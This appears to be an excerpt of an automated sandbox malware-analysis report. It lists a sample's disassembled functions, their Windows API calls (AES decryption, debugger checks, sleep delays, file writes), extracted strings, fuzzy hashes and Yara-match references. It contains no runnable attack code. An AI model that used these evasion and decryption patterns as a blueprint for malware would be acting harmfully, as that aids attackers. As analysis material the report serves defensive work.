SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04A26D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04A24B4E
__Init_thread_footer.LIBCMT ref: 04A24BDC
__Init_thread_footer.LIBCMT ref: 04A24E45
CoInitialize.OLE32(00000000), ref: 04A24EC6
CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04A24EE1
__Init_thread_footer.LIBCMT ref: 04A25344
Sleep.KERNEL32(00000BB8,00000000,?,04A26D08,0041D8D0,0042DBDC,0042DBDD), ref: 04A2555C
__Init_thread_footer.LIBCMT ref: 04A25652
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04A26D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04A24F4F

Part of subcall function 04A30A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04A25D06,00000000,0042C014), ref: 04A30A9E
Part of subcall function 04A30A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A30ABD

__Init_thread_footer.LIBCMT ref: 04A242AD

Part of subcall function 04A29EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29EEC
Part of subcall function 04A29EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F1F

Part of subcall function 04A22487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04A224BD
Part of subcall function 04A22487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04A224DE
Part of subcall function 04A22487: CloseHandle.KERNEL32(00000000), ref: 04A224E5

__Init_thread_footer.LIBCMT ref: 04A24489

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

Strings

rmBK, xrefs: 04A24B61
ZK\., xrefs: 04A24DF2
O@K\, xrefs: 04A24B6B
Y@BA, xrefs: 04A248C7

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
String ID: O@K\$Y@BA$ZK\.$rmBK
API String ID: 529012138-2391139619
Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
Instruction ID: 122ac1b53e479e8aac7ef5604c2e2870d250e195f762e0ad315ecede0ce11164
Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
Instruction Fuzzy Hash: 5BF2E2B0E042649FEB24CF28CE48BADBBB4AF44308F5442D8E4096B291D775BAC5DF55

Function 04A23837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04A238B7
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04A238DB
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04A23945
GetLastError.KERNEL32 ref: 04A2394F
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04A23977
GetLastError.KERNEL32 ref: 04A23981
CryptReleaseContext.ADVAPI32(?,00000000), ref: 04A23991
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04A23A53
CryptDestroyKey.ADVAPI32(?), ref: 04A23AC5

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04A23893

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3761881897-63410773
Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
Instruction ID: 98f8d34df6803fbae75c559982ce60fda36e9a766ea7f6569f29c2bc16ff9bea
Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
Instruction Fuzzy Hash: 9F819371A00228AFEF248F28CD45B9EBBB5FF45300F4481A9E90DD7291DB35AE859F51

Function 04A251D7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04A30A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04A25D06,00000000,0042C014), ref: 04A30A9E
Part of subcall function 04A30A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A30ABD

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

__Init_thread_footer.LIBCMT ref: 04A25344
Sleep.KERNEL32(00000BB8,00000000,?,04A26D08,0041D8D0,0042DBDC,0042DBDD), ref: 04A2555C
__Init_thread_footer.LIBCMT ref: 04A25652
Sleep.KERNEL32(000007D0), ref: 04A259BC
Sleep.KERNEL32(000007D0), ref: 04A259D6

Strings

@BAO, xrefs: 04A255E3
updateSW, xrefs: 04A258E2

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: @BAO$updateSW
API String ID: 3554146954-956047173
Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
Instruction ID: e874a9535f0271544a924c7be9924dc90c38c6973f7e05a043b5964da8314e1b
Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
Instruction Fuzzy Hash: C83224B0E002649BEF28DF28CE587AEBBB4BF04304F5441E9D4096B291D775AE84EF55

Function 005E7CB0 Relevance: 10.4, Strings: 7, Instructions: 1698COMMON

Download Yara Rule

Strings

BgS, xrefs: 005E7EBE
rlr, xrefs: 005E8F33
p<O>, xrefs: 005E7FE0
"{, xrefs: 005E8D59
"{, xrefs: 005E8D54
P_, xrefs: 005E8A5A
#XU, xrefs: 005E8342

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: #XU$BgS$P_$p<O>$rlr$"{$"{
API String ID: 0-214397073
Opcode ID: 08d3a04abde912e45e2e0a1886f317429aa85fcf04fa45e6fad6a2f1bc94ab1b
Instruction ID: 801a4bc6dce8b50cd29529f6f7ddaef14633b6b44003dbf37262251e5ece85b9
Opcode Fuzzy Hash: 08d3a04abde912e45e2e0a1886f317429aa85fcf04fa45e6fad6a2f1bc94ab1b
Instruction Fuzzy Hash: C8B20AF36082049FE3046E2DEC85A7BFBE9EFD4620F1A453DEAC4C7744E93598058692

Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0041A55D

Strings

1#INF, xrefs: 0041A47C
1#QNAN, xrefs: 0041A459
1#SNAN, xrefs: 0041A452
1#IND, xrefs: 0041A44B

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85

Function 005EB19F Relevance: 7.9, Strings: 5, Instructions: 1673COMMON

Download Yara Rule

Strings

`Y, xrefs: 005EBDAC
j?;, xrefs: 005EBCAF
8fw{, xrefs: 005EB6DD
_Uoy, xrefs: 005EBD49
J_w7, xrefs: 005EBDA0

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: 8fw{$J_w7$_Uoy$`Y$j?;
API String ID: 0-511192024
Opcode ID: fd400be2463a46f4c40d92fc598e1732068976f57b106b5f03a2dae54fff7413
Instruction ID: 7df7e8605bed328d7017903ea5c85239412399383ff8a5531c099cb83e38a541
Opcode Fuzzy Hash: fd400be2463a46f4c40d92fc598e1732068976f57b106b5f03a2dae54fff7413
Instruction Fuzzy Hash: 39B209F361C204AFE704AE2DEC8567ABBE9EF98320F16453DE6C5C3740E67598018697

Function 005DF577 Relevance: 6.7, Strings: 4, Instructions: 1675COMMON

Download Yara Rule

Strings

p,J, xrefs: 005DFC2F
@XTn, xrefs: 005DF64E
P\?, xrefs: 005DFFDE
PpGp, xrefs: 005E0143

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: @XTn$P\?$PpGp$p,J
API String ID: 0-729799
Opcode ID: 02311c9f725de4871428773df57f2ebe1fa4f50cac77379bd0fc556bf7c9cea0
Instruction ID: 7f77a7b223b9c797d6c58c2fce92d184120cd340194467992223ed32a2ba070a
Opcode Fuzzy Hash: 02311c9f725de4871428773df57f2ebe1fa4f50cac77379bd0fc556bf7c9cea0
Instruction Fuzzy Hash: A9B2F5F36082049FE304AE2DEC8567AFBE5EF94320F1A493DE6C5C3744EA7598058697

Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94

Function 04A30BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
Instruction ID: f37336c039e370ba75be6cdbba2c02a49b38d97903dbcf28b5c9721d4d55fa34
Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
Instruction Fuzzy Hash: 14023D71E012199FDB14CFA9D9806AEFBF1FF48315F248269E519EB384E731A941CB90

Function 005EE957 Relevance: 6.4, Strings: 4, Instructions: 1446COMMON

Download Yara Rule

Strings

gAm>, xrefs: 005EFA9C
+im, xrefs: 005EE987
[c\H, xrefs: 005EF4A5
+{w, xrefs: 005EF5DC

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: +im$[c\H$gAm>$+{w
API String ID: 0-1508420521
Opcode ID: 556668406f3d63acb411be36bb4133af0422a60b4737247509402c38948cde16
Instruction ID: bb007b505ab219c2ae3ffef29985e71d2fb99995137adf7367d5509a4b5879e6
Opcode Fuzzy Hash: 556668406f3d63acb411be36bb4133af0422a60b4737247509402c38948cde16
Instruction Fuzzy Hash: 96925AF390C2149FE3046E2DEC8577ABBE9EF94320F1A863DEAC4D3744E97558058692

Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
IsDebuggerPresent.KERNEL32 ref: 0040A662
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49

Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
IsDebuggerPresent.KERNEL32 ref: 100030B2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04

Function 04A2A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 04A2A7FD
IsDebuggerPresent.KERNEL32 ref: 04A2A8C9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04A2A8E9
UnhandledExceptionFilter.KERNEL32(?), ref: 04A2A8F3

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
Instruction ID: 8b714f07303eb649f6692161de1d1deeacb8c17107750e14c0b69368afbb578e
Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
Instruction Fuzzy Hash: D8311AB5D0122DDBDB10DFA5DA497CCBBB8BF08304F1040AAE50DA7250EB719A85DF44

Function 005DDAAB Relevance: 5.3, Strings: 3, Instructions: 1589COMMON

Download Yara Rule

Strings

<O, xrefs: 005DE9D2
w<z;, xrefs: 005DDAE5
1>^, xrefs: 005DDD45

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: w<z;$<O$1>^
API String ID: 0-1933546046
Opcode ID: 6e2977e25c8f91dad3951e7eb6fc8c9f65e83565c6851a6b01c293b437c3cfd4
Instruction ID: 968137fab1302effc0ee73e6ff3c7ef61daaa33a3c7d99a25c40b3bc5d111d9a
Opcode Fuzzy Hash: 6e2977e25c8f91dad3951e7eb6fc8c9f65e83565c6851a6b01c293b437c3cfd4
Instruction Fuzzy Hash: 90B208F3A0C2109FE3046E2DEC8167AFBE9EF94720F1A453DEAC587744EA7558018697

Function 005E4832 Relevance: 5.3, Strings: 3, Instructions: 1579COMMON

Download Yara Rule

Strings

IrYs, xrefs: 005E4B7D
{XZ@, xrefs: 005E4982
qE^K, xrefs: 005E4B83

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: IrYs$qE^K${XZ@
API String ID: 0-684726585
Opcode ID: 84d9efe27bc9cc981c6e909d72718e62d1488e98bcc97f61d2df03b85e498b87
Instruction ID: a45aed5ef0d19b7befd00f73511457759b17234b6d9df94e4565e3b4689143a6
Opcode Fuzzy Hash: 84d9efe27bc9cc981c6e909d72718e62d1488e98bcc97f61d2df03b85e498b87
Instruction Fuzzy Hash: 23B2F4F360C6009FE304AE29EC8567AFBE5EF94720F1A893DE6C4C7744EA3558058697

Function 005D7397 Relevance: 5.2, Strings: 3, Instructions: 1466COMMON

Download Yara Rule

Strings

?_, xrefs: 005D7A0C
Wx[w, xrefs: 005D75C8
tGt?, xrefs: 005D7FB5

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: ?_$Wx[w$tGt?
API String ID: 0-334856524
Opcode ID: 16135d603c23f048f730b1733ad37c1fc3fa4be0ea75e9e1079eac998950ca7c
Instruction ID: 9bd1dc456b5de81bdc51c9ce46de0ade360dddc7b8ba286fc205c3cd317f3bd0
Opcode Fuzzy Hash: 16135d603c23f048f730b1733ad37c1fc3fa4be0ea75e9e1079eac998950ca7c
Instruction Fuzzy Hash: 3292F7F360C204AFE304AE2DEC8577ABBE9EF94320F16493DE6C5C7744E93598058696

Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49

Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44

Function 04A2D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,04A22AA0), ref: 04A2D142
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04A22AA0), ref: 04A2D14C
UnhandledExceptionFilter.KERNEL32(04A2277A,?,?,?,?,?,04A22AA0), ref: 04A2D159

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
Instruction ID: 63972d99677bd0bb372d3ca28734303a3160c22f0d91661036520f28dddb83d3
Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
Instruction Fuzzy Hash: 9031D8B49012289BDB21DF68DD897CDBBB8BF08310F5041EAE40CA7261E770AF859F44

Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
ExitProcess.KERNEL32 ref: 10005F60

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41

Function 005DB185 Relevance: 4.4, Strings: 3, Instructions: 603COMMON

Download Yara Rule

Strings

$b:_, xrefs: 005DB389
s2&}, xrefs: 005DB4DF
%u?, xrefs: 005DB5F6

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: $b:_$%u?$s2&}
API String ID: 0-589896418
Opcode ID: 2ebde086369e779d2f6da0930611f27c62511691823b529aa70199b1f2af2062
Instruction ID: e8a705229c68bbcd82f008e86dc27b851eb3876233718393f23aff53c65abb8e
Opcode Fuzzy Hash: 2ebde086369e779d2f6da0930611f27c62511691823b529aa70199b1f2af2062
Instruction Fuzzy Hash: F412DEF3A086009FE3146F2DEC8567AFBE5EF94720F1A493DE6C487744EA7558418A82

Function 005E97EC Relevance: 4.1, Strings: 2, Instructions: 1585COMMON

Download Yara Rule

Strings

W_W}, xrefs: 005EA4EF
z@~{, xrefs: 005EAA8F

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: W_W}$z@~{
API String ID: 0-465610861
Opcode ID: 436f1acd696feb0cd7a2b8f116a54ce50253237a3cdba2ee603b804341f2e0bf
Instruction ID: 354817f419664a68ebb6dc320a26e0155e21b04a34df9439a5744c596605fef1
Opcode Fuzzy Hash: 436f1acd696feb0cd7a2b8f116a54ce50253237a3cdba2ee603b804341f2e0bf
Instruction Fuzzy Hash: 5CB209F3A082149FE304AE2DEC8567AFBE9EF94720F16493DEAC4C7744E63558018697

Function 005D8BFE Relevance: 4.0, Strings: 2, Instructions: 1526COMMON

Download Yara Rule

Strings

^R{|, xrefs: 005D8C17
G3n/, xrefs: 005D96DA

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: G3n/$^R{|
API String ID: 0-2669164548
Opcode ID: 54af851dc1cdf1abffe8b98bb9437d649a9880fbc472cac8442795330f0dda92
Instruction ID: bbba3a27d45e69a68c1dbb6cbba60009bc2afdc525a9792a4e204ce93a8e7a74
Opcode Fuzzy Hash: 54af851dc1cdf1abffe8b98bb9437d649a9880fbc472cac8442795330f0dda92
Instruction Fuzzy Hash: A5A2E5F360C204AFE3046E29EC8567ABBE5EF94720F16493DE6C4C3744EA7558418B97

Function 04A2092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 04A2095F
GetProcAddress., xrefs: 04A209DC, 04A209DF, 04A209E4
l, xrefs: 04A20966

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 4d12a81f956723e7ddd700fa09161ea5ac542af84de027b3618aba49c63a2486
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 1C317AB6905629DFEB10CF99C980AAEBBF5FF08324F14404AD541A7310D771FA45DBA4

Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,A5E27AAC), ref: 00410837
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

